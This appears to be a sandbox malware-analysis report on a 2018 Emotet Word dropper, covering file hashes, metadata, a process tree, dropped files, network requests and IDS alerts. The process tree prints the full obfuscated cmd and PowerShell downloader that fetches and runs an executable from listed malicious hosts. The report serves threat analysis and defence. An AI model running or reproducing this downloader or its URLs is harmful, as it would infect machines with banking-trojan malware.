File name: | 0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e |
Full analysis: | https://app.any.run/tasks/07edf35d-77d5-4ca8-aed4-d59b4bafefa4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 13:30:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Luke-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 10:48:00 2018, Last Saved Time/Date: Tue Nov 13 10:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | DC67B408334690FB81B8B4AAFCEDD000 |
SHA1: | E3AE09C744D827176E31F2C5BBCBE4AC0D13093A |
SHA256: | 0A6D1812559D81C236C495EF207E3C34949312467C424D31720A857F2495E67E |
SSDEEP: | 1536:bjG+ocn1kp59gxBK85fBt+a9kJ38F7lE+753uZ4JnLJ38F7lr1wXQt39C1OXUZ22:nu41k/W486J38F7lE+753uZ4JnLJ38FI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Luke-PC |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:13 10:48:00 |
ModifyDate: | 2018:11:13 10:48:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3160 | CMD /c c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2596 | c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | c:\WInDowS\sySteM32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2076 | poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( & ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2180 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3856 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | 960.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2396 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | 960.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2752 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Version: 6.2.9200. |
PID | Process | Filename | Type | |
---|---|---|---|---|
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9863.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQEKNV6AVOJXX4GVVVE5.temp | — | |
MD5:— | SHA256:— | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:EAD40168CD6328019291DD00BEDCE23A | SHA256:1A1B47D1DD1AB828BF8A3064D7280E9274A454E99D50EB0E1F26FB497B639620 | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc | pgc | |
MD5:3BB9D1068A8E664ABF8C800D579EC8A1 | SHA256:952B8551C8F0B58CD69234E82D2D1A87C63ADC968A3719469247C0940D05FAC6 | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da40b.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\960.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
3856 | 960.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:C677542E4AA57BEC15B00E5AF4FDC6EC | SHA256:DA07FC26A9DDED88EF3C27F0CD5145F68620FB599F2D56CE1675A801BFA878EC | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2752 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
2076 | powershell.exe | GET | 200 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX/ | US | executable | 448 Kb | malicious |
2076 | powershell.exe | GET | 301 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX | US | html | 617 b | malicious |
2076 | powershell.exe | GET | 401 | 31.220.125.13:80 | http://www.bluepuma.at/97Hf4F | DE | html | 381 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2076 | powershell.exe | 31.220.125.13:80 | www.bluepuma.at | Mittwald CM Service GmbH und Co.KG | DE | malicious |
2076 | powershell.exe | 72.9.110.98:80 | www.naimalsadi.com | Access Integrated Technologies, Inc. | US | malicious |
2752 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
Domain | IP | Reputation |
---|---|---|
www.bluepuma.at |
| malicious |
www.naimalsadi.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2076 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2076 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2076 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2076 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2076 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2076 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |